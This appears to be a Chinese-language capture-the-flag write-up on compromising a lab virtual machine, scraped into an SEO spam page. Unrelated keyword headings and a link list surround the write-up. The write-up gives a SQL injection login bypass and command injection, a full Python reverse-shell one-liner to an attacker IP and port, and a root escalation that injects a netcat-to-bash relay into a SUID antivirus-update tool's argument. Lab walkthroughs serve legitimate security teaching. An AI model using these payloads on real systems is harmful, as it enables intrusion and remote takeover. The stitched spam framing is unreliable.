当前位置: 首页 > news >正文

销售管理软件新技术上海抖音seo

销售管理软件新技术,上海抖音seo,上饶金河湾做网站,网站流量怎么做目录 信息搜集 WEB漏洞攻击 拿shell 信息搜集 首先ifconfig查看自己IP, netdiscover查看同网段下主机 第三个应该是目标靶机。用nmap查看靶机开放端口: 开放22和8080,看看8080开的啥服务 WEB漏洞攻击 看到让我们输入邀请码。有输入框的第…

目录

信息搜集

WEB漏洞攻击

拿shell


信息搜集

首先ifconfig查看自己IP,

netdiscover查看同网段下主机

第三个应该是目标靶机。用nmap查看靶机开放端口:

开放22和8080,看看8080开的啥服务

WEB漏洞攻击

看到让我们输入邀请码。有输入框的第一个反应是RCE,尝试几次后无果。后续测试SQL注入,发现在输入"时报错

Flask框架,最后一段报错信息直接看到搜索逻辑源码

输入其它内容时全部回显

推断布尔盲注,order by 尝试字段数

1" order by 1--+ 正常

1" order by 2--+ 报错

后续尝试

1" and left(version(),1)=5 --+

无果

直接万能密码开摆:

1" or 1=1 --+

emmmm,进来了

还是看看能否RCE

输入111|ls

拿shell

出了,弹个shell试试

cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.72",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

成了

看看文件权限

有一个ROOT文件,下面有它的C文件,读一下看看

发现程序定义了一个执行参数,如果程序在执行中不包含参数,则会打印出:

This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;

如果执行程序使用了参数,那么程序就会执行freshclam,运行病毒库更新

可以试试提权:

./update_cloudav "666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666"

拿到ROOT权限

http://www.khdw.cn/news/46701.html

相关文章:

  • 视频制作网站都有哪些模板建站教程
  • 和coser做网站大连seo顾问
  • 做网站一般几个人竞价账户托管的公司有哪些
  • 开店加盟代理南昌seo
  • 网站设计滚动图片怎么做岳阳网站设计
  • 帝国网站模板建设视频新网站百度收录
  • 相亲网站如何做自我介绍我为什么不建议年轻人做销售
  • 福建做网站的公司网络运营怎么做
  • 政府网站建设典型经验材料seo排名首页
  • 潇朋友免费班级网站建设系统小说网站排名免费
  • 建游戏网站个人信息怎么在百度推广
  • 福田做商城网站建设哪家公司便宜点网站推广优化价格
  • 网站建设那个网站好推广一手渠道
  • 阳泉做网站公司网盘app下载
  • 大连网站设计九首选仟亿科技logo网站设计
  • 外贸网站优化免费渠道沈阳网站seo
  • 网站没有icp备案是不是就是骗子推广宣传文案
  • 沈阳网站建设多少钱泉州seo报价
  • 网站建设与运营主营业务收入外贸接单平台哪个最好
  • 汉中公司做网站泰安百度推广电话
  • 做服装招聘的网站有哪些内容手机seo关键词优化
  • 石家庄网站建设开发去除痘痘怎么有效果
  • 网站设计方案模板沈阳网站建设制作公司
  • 中山中小型网站公司网站建设费
  • 音乐影视网站建设方案重庆seo排
  • 深圳创意设计网站seo如何建立优化网站
  • 网站制作费用预算表模板免费下载网站
  • 网站做不做双解析百度后台登陆入口
  • wordpress 内存优化搜索引擎营销简称seo
  • 优化大师电脑版官网汕头百度seo公司